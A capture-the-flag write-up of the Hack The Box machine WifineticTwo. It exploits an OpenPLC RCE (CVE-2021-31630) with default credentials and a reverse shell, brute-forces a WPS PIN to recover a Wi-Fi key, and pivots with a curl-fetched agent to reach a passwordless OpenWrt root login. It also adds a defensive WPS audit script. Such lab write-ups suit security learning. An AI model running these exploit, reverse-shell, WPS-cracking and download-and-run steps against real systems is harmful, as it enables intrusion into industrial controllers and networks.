HTB - WifineticTwo

Machine Info
WifineticTwo is a medium-difficulty Linux machine that features OpenPLC running on port 8080, vulnerable to Remote Code Execution through the manual exploitation of CVE-2021-31630. After obtaining an initial foothold on the machine, a WPS attack is performed to acquire the Wi-Fi password for an Access Point (AP). This access allows the attacker to target the router running OpenWRT and gain a root shell via its web interface.
Enumeration
Scope
IP Address: 10.10.11.7
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
8080/tcp open http-proxy syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open http-proxy Werkzeug/1.0.1 Python/2.7.18
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
<SNIP>
* Open ports: 22 - 8080
* Services: SSH - HTTP
* Important notes: OpenPLC
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ sudo sh -c "echo '$ip wifinetictwo.htb' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ tail -n1 /etc/hosts
10.10.11.7 wifinetictwo.htb
http://10.10.11.7:8080/login

A quick search for OpenPLC CVEs:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ searchsploit OpenPLC
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenPLC 3 - Remote Code Execution (Authenticated) | python/webapps/49803.py
OpenPLC WebServer 3 - Denial of Service | multiple/dos/51746.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Initial Access
I don't have credentials yet, so I tried the default ones, openplc:openplc, and it worked.

http://10.10.11.7:8080/dashboard

The exploit we have needs credentials, so now I can run it.
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ git clone https://github.com/thewhiteh4t/cve-2021-31630.git
<snip>
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/cve-2021-31630]
└─$ python3 cve_2021_31630.py -u openplc -p openplc -lh 10.10.16.7 -lp 443 http://10.10.11.7:8080
------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------
[>] Found By : Fellipe Oliveira
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[>] Target : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout : 200 secs
[>] LHOST : 10.10.16.7
[>] LPORT : 443
[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful!
Receive Connection
┌──(kali㉿kali)-[~/study/Courses/HackThebox/HTB/machines/WifineticTwo]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.7] 47504
id
uid=0(root) gid=0(root) groups=0(root)
Upgrade the shell
script /dev/null -c bash
Ctrl+z
stty -echo raw; fg
reset
Terminal type? screen
stty rows 37 columns 189
export TERM=xterm-256color
I found myself running commands as root, so maybe I'm in a Docker container or some kind of virtualization.
The user flag is in the /root directory.
root@attica01:/# ls /root
user.txt
root@attica01:~# cat user.txt
850e68329cf676exxxxxxxxxxxxxxxx
User Flag: 850e68329cf676exxxxxxxxxxxxxxxx
Privilege Escalation
The IP address of the machine is not here, which makes me sure I'm not on the actual host. There is also a wlan0 interface.
root@attica01:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.3.2 netmask 255.255.255.0 broadcast 10.0.3.255
inet6 fe80::216:3eff:fefc:910c prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:fc:91:0c txqueuelen 1000 (Ethernet)
RX packets 5716 bytes 529625 (529.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4286 bytes 1207374 (1.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 715 bytes 39478 (39.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 715 bytes 39478 (39.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
I uploaded linpeas.sh to the box to enumerate and collect useful info from the host, but didn't find anything interesting. linpeas.sh tells me that it's a virtual machine (lxc):
═╣ Is this a virtual machine? ..... Yes (lxc)
Enumerating installed programs shows that there are wireless tools here:
root@attica01:~$ apt list --installed | cut -d"/" -f1,3
<snip>
whiptail
wireless-regdb
wireless-tools
wpasupplicant
<snip>
Following up on this post, I was able to work with the wireless interface on that host:
root@attica01:~$ iw wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
last seen: 4928.704s [boottime]
TSF: 1721706237223201 usec (19927d, 03:43:57)
freq: 2412
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: plcrouter
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 1
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Supported operating classes:
* current operating class: 81
Extended capabilities:
* Extended Channel Switching
* SSID List
* Operating Mode Notification
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Response Type: 3 (AP)
* UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
* Manufacturer:
* Model:
* Model Number:
* Serial Number:
* Primary Device Type: 0-00000000-0
* Device name:
* Config methods: Label, Display, Keypad
* Version2: 2.0
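The WPS section of that scan (state "Configured", config methods Label/Display/Keypad) is what makes the AP a PIN brute-force target. The following Python is an added example, not part of the write-up: it parses `iw` scan output and flags APs that advertise WPS in a PIN-capable state, using a constructed scan sample modelled on the plcrouter beacon plus one AP without WPS.

```python
"""Audit `iw dev wlan0 scan` output for APs advertising WPS in a PIN-capable state,
the condition plcrouter exposes above. Added example, not part of the write-up;
the scan text is constructed to mirror the plcrouter beacon plus a WPS-less AP."""
import re
from dataclasses import dataclass

SAMPLE_SCAN = """\
BSS 02:00:00:00:01:00(on wlan0)
    SSID: plcrouter
    RSN:     * Authentication suites: PSK
    WPS:     * Wi-Fi Protected Setup State: 2 (Configured)
         * Config methods: Label, Display, Keypad
BSS 02:00:00:00:03:00(on wlan0)
    SSID: office
    RSN:     * Authentication suites: PSK
"""
# Config methods that let an external registrar drive the 8-digit PIN exchange.
PIN_METHODS = {"Label", "Display", "Keypad"}
FIELDS = {r"^SSID:": "ssid", r"Authentication suites:": "auth",
          r"Protected Setup State:": "wps_state", r"Config methods:": "config_methods"}

@dataclass
class AccessPoint:
    bssid: str
    ssid: str = ""
    auth: str = ""
    wps_state: str = ""             # e.g. "2 (Configured)"; empty when no WPS IE
    config_methods: str = ""        # e.g. "Label, Display, Keypad"

    def wps_pin_exposed(self) -> bool:
        """WPS is configured and at least one PIN-based config method is offered."""
        methods = {m.strip() for m in self.config_methods.split(",")}
        return self.wps_state.startswith("2") and bool(methods & PIN_METHODS)

def parse_iw_scan(text: str) -> list:
    """Turn `iw scan` output into AccessPoint records; indentation is ignored."""
    aps = []
    for line in (raw.strip() for raw in text.splitlines()):
        if m := re.match(r"BSS ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", line):
            aps.append(AccessPoint(bssid=m.group(1)))
            continue
        for pattern, attr in FIELDS.items():       # value = text after the match
            if aps and (m := re.search(pattern, line)):
                setattr(aps[-1], attr, line[m.end():].strip())
    return aps

def audit(text: str) -> list:
    """One finding per AP whose WPS PIN exchange is reachable over the air."""
    return [f"{ap.bssid} {ap.ssid}: WPS configured with PIN methods offered; disable WPS"
            for ap in parse_iw_scan(text) if ap.wps_pin_exposed()]
```

Run `audit()` over the output of `iw dev wlan0 scan` on a site survey; any line it returns is an AP that should have WPS (or at least its PIN mode) switched off.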
I got a hint from the community about the oneshot tool, which attacks wireless networks by brute force.
root@attica01:~$ python3 oneshot.py -i wlan0
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Networks list:
# BSSID ESSID Sec. PWR WSC device name WSC model
1) 02:00:00:00:01:00 plcrouter WPA2 -30
Select target (press Enter to refresh): 1
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaxxxxxxxxxxx'
[+] AP SSID: 'plcrouter'
Connect to the plcrouter network
root@attica01:~$ wpa_passphrase plcrouter >> /etc/wpa_supplicant/wpa_supplicant.conf
# reading passphrase from stdin
NoWWEDoKnowWhaxxxxxxxxxxx
root@attica01:~$ wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
ioctl[SIOCSIWENCODEEXT]: Invalid argument
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Verify successful connection
root@attica01:~# iw wlan0 link
Connected to 02:00:00:00:01:00 (on wlan0)
SSID: plcrouter
freq: 2412
RX: 16029 bytes (229 packets)
TX: 1116 bytes (11 packets)
signal: -30 dBm
rx bitrate: 1.0 MBit/s
tx bitrate: 12.0 MBit/s
bss flags: short-slot-time
dtim period: 2
beacon int: 100
But I didn't get an IP address:
root@attica01:~# ip addr show wlan0
5: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
inet6 fe80::ff:fe00:200/64 scope link
valid_lft forever preferred_lft forever
So I'll add one manually. I wasn't sure which subnet to assign to the interface, so I decided to give it a try.
root@attica01:~$ ifconfig wlan0 192.168.1.5 netmask 255.255.255.0
root@attica01:~$ ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.5 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:200 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
I set up a tunnel to enumerate the new network from my kali machine.
┌──(kali㉿kali)-[~/…/Tools/Pivot/ligolo-ng]
└─$ ./proxy-server -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
ligolo-ng »
root@attica01:~$ curl 10.10.16.7/agent.sh -o agent.sh
root@attica01:~$ chmod +x agent.sh
root@attica01:~$ ./agent.sh -connect 10.10.16.7:11601 -ignore-cert
ligolo-ng » session
1
ligolo-ng » start
Add the network route to the ligolo interface and ping sweep the network with fping:
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ sudo ip route add 192.168.1.0/24 dev ligolo
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ fping -asgq 192.168.1.0/24
192.168.1.1
192.168.1.5
192.168.1.5 is the IP I assigned to the wlan0 interface, so I will attack 192.168.1.1:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ nmap 192.168.1.1 -F -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 00:19 EDT
Nmap scan report for 192.168.1.1
Host is up (0.10s latency).
Not shown: 92 closed tcp ports (conn-refused)
PORT STATE SERVICE
7/tcp filtered echo
22/tcp open ssh
53/tcp open domain
80/tcp open http
443/tcp open https
514/tcp filtered shell
2001/tcp filtered dc
49154/tcp filtered unknown
I found SSH is there, so I tried to connect to it as root:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ ssh root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts.
BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
OpenWrt 23.05.2, r23630-842932a63d
-----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@ap:~#
root@ap:~$ cat root.txt
bd361577bf4d8653xxxxxxxxxxxxxxxx
Root Flag: bd361577bf4d8653xxxxxxxxxxxxxxxx